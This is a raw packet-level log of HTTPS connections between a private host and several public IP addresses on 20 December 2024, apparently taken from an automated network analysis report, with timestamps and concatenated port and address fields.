                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.437308073 CET49853443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.445075035 CET49853443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.445086956 CET44349853172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.446316957 CET44349853172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.446383953 CET49853443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.456336021 CET49853443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.456374884 CET49853443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.456420898 CET44349853172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.456453085 CET49853443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.456500053 CET49853443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.464112043 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.464144945 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.464394093 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473159075 CET49854443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473159075 CET49854443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473262072 CET49854443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473359108 CET44349854172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473436117 CET49854443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473440886 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473474026 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473562956 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473709106 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473723888 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473897934 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:57.473917007 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.696017027 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.696299076 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.696309090 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.697356939 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.697422028 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.698419094 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.698484898 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.698704958 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.698709965 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.699492931 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.699700117 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.699724913 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.701209068 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.701270103 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.702236891 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.702363968 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.741127968 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.756345987 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.756361961 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:58.802011967 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.550957918 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.551212072 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.551244020 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.551333904 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.551359892 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.551556110 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.551573992 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.560594082 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.560872078 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.560908079 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.568875074 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.569390059 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.569425106 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.617928982 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.617969036 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.662682056 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.670603991 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.718976021 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.718996048 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.750979900 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.751101017 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.751107931 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.751136065 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.751174927 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.758514881 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.761605024 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.761702061 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.761888027 CET49860443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:59.761903048 CET44349860172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.135638952 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.135699034 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.135797977 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.136224031 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.136313915 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.136373997 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.136668921 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.136789083 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.136856079 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.137089014 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.137100935 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.137130022 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.137145996 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.137453079 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:00.137475014 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.366755009 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.367038965 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.367057085 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.367369890 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.367716074 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.367739916 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.368139029 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.368231058 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.368895054 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.368967056 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.369694948 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.369781017 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.370057106 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.370064974 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.370204926 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.370265961 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.370469093 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.370476961 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.376971960 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.377197981 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.377239943 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.378942966 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.379013062 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.379951000 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.380040884 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.380074024 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.410201073 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.425513029 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.425515890 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.425529957 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.472388029 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.813862085 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820128918 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820194960 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820231915 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820250034 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820259094 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820265055 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820321083 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820334911 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.820420980 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.828535080 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.831933022 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.832043886 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.832298994 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.832983017 CET49868443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.833002090 CET44349868104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.834995985 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.835053921 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.835179090 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.835688114 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.835705996 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.840653896 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.840740919 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.840759039 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.848706007 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.848817110 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.848826885 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.860904932 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.895205021 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933588028 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933619022 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933636904 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933681011 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933679104 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933703899 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933736086 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933743000 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933763981 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933789968 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.933813095 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.940151930 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.987360001 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:01.987397909 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.022289991 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.022480965 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.022492886 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.031120062 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.031219006 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.031233072 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.038707972 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.038830042 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.038841963 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.046885967 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.046977997 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.046987057 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.057996988 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.058024883 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.058068037 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.058096886 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.058110952 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.058175087 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.058206081 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.058262110 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.062386036 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.062479973 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.062479019 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.062498093 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.062550068 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.070415974 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.078161001 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.078202963 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.078255892 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.078269005 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.078344107 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.085289001 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.092236996 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.092350006 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.092365980 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100433111 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100528002 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100538015 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100745916 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100822926 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100836992 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100936890 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100989103 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.100989103 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.106822968 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.106904030 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.106914043 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.113636971 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.113658905 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.113759995 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.113825083 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.113825083 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.114260912 CET49867443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.114281893 CET44349867104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.223068953 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.223104954 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.223200083 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.223251104 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.223282099 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.223423004 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.250967979 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.251049042 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.251100063 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.251147985 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.251184940 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.251204014 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.259887934 CET49876443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.259931087 CET44349876104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.259995937 CET49876443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.260215998 CET49876443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.260229111 CET44349876104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.266784906 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.266885996 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.266910076 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.267000914 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.267230034 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.274137020 CET49869443192.168.2.11151.101.194.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.274173975 CET44349869151.101.194.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.526144981 CET49877443192.168.2.11151.101.2.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.526207924 CET44349877151.101.2.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.530306101 CET49877443192.168.2.11151.101.2.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.538125038 CET49877443192.168.2.11151.101.2.137
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:02.538145065 CET44349877151.101.2.137192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.052437067 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.053742886 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.053755045 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.054116011 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.055457115 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.055527925 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.055627108 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.099324942 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.510806084 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.510881901 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.510925055 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.510957003 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.511015892 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.511106968 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.511116982 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.515857935 CET44349876104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.516076088 CET49876443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.516088963 CET44349876104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.517129898 CET44349876104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.517187119 CET49876443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.517206907 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.517257929 CET49875443192.168.2.11104.18.95.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.517278910 CET44349875104.18.95.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.517523050 CET49876443192.168.2.11104.17.24.14
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.517580986 CET44349876104.17.24.14192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:03.517673969 CET49876443192.168.2.11104.17.24.14
